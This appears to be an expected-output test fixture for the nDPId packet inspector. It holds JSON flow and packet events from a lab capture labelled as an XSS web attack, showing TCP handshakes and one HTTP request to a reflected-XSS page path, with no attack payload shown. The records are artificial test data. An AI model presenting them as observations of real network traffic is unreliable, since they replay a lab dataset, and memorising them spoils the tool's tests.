-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6442,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347739497,"flow_last_seen":1499347739497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347739497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6442,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1499347739497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347739497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XjZAAD4GZ5qsEAABwKgKMuwIAFCYkYeRAAAAAKACchB3pQAAAgQFtAQCCAoBO9mnAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6443,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":2,"flow_last_seen":1499347739497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347739497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7AiW6z+EmJGHkqAScSDzEwAAAgQFtAQCCAoD5asbATvZpwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":3,"flow_last_seen":1499347739498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347739498,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XjdAAD4GZ6GsEAABwKgKMuwIAFCYkYeSlus\/hYAQAOWSGwAAAQEICgE72acD5asb"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347740751,"flow_last_seen":1499347740751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740751,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1499347740751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347740751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8V35AAD4GblKsEAABwKgKMuwWAFBKCo2eAAAAAKACchC+2AAAAgQFtAQCCAoBO9rgAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6455,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":2,"flow_last_seen":1499347740751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347740751,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Bb1vAeUSgqNn6AScSASLAAAAgQFtAQCCAoD5axVATva4AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6456,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":3,"flow_last_seen":1499347740752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347740752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0V39AAD4GblmsEAABwKgKMuwWAFBKCo2f9bwHlYAQAOWxMwAAAQEICgE72uAD5axV"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347743331,"flow_last_seen":1499347743331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347743331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1499347743331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iytAAD4GOqWsEAABwKgKMuwwAFCeqlZOAAAAAKACchCe6QAAAgQFtAQCCAoBO91lAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":2,"flow_last_seen":1499347743331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7DCbKjZEnqpWT6AScSAbmgAAAgQFtAQCCAoD5a7aATvdZQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6474,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":3,"flow_last_seen":1499347743332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347743332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iyxAAD4GOqysEAABwKgKMuwwAFCeqlZPmyo2RYAQAOW6oQAAAQEICgE73WUD5a7a"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347744595,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347744595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGtAAD4GPWWsEAABwKgKMuw+AFAw9lbKAAAAAKACchAK2AAAAgQFtAQCCAoBO96hAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":2,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7D5E+wDpMPZWy6AScSAR1wAAAgQFtAQCCAoD5bAWATveoQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":3,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGxAAD4GPWysEAABwKgKMuw+AFAw9lbLRPsA6oAQAOWw3gAAAQEICgE73qED5bAW"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347747187,"flow_last_seen":1499347747187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347747187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1499347747187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eZ5AAD4GTDKsEAABwKgKMuxYAFDkpJi3AAAAAKACchASmgAAAgQFtAQCCAoBO+EpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":2,"flow_last_seen":1499347747187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7FgZ9EBx5KSYuKAScSACkAAAAgQFtAQCCAoD5bKeATvhKQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":3,"flow_last_seen":1499347747188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347747188,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eZ9AAD4GTDmsEAABwKgKMuxYAFDkpJi4GfRAcoAQAOWhlwAAAQEICgE74SkD5bKe"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6518,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347748472,"flow_last_seen":1499347748472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347748472,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6518,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1499347748472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347748472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W1pAAD4GanasEAABwKgKMuxmAFDolLkwAAAAAKACchDs4QAAAgQFtAQCCAoBO+JqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":2,"flow_last_seen":1499347748472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347748472,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Gb4tplB6JS5MaAScSCkAwAAAgQFtAQCCAoD5bPfATviagEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":3,"flow_last_seen":1499347748473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347748473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W1tAAD4Gan2sEAABwKgKMuxmAFDolLkx+LaZQoAQAOVDCgAAAQEICgE74msD5bPf"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6527,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347749751,"flow_last_seen":1499347749751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347749751,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6527,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1499347749751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347749751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IJFAAD4GpT+sEAABwKgKMux0AFD35MM7AAAAAKACchDSOAAAAgQFtAQCCAoBO+OqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6528,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":2,"flow_last_seen":1499347749752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347749752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7HSHR7QM9+TDPKAScSDevgAAAgQFtAQCCAoD5bUfATvjqgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":3,"flow_last_seen":1499347749752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347749752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IJJAAD4GpUasEAABwKgKMux0AFD35MM8h0e0DYAQAOV9xgAAAQEICgE746oD5bUf"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 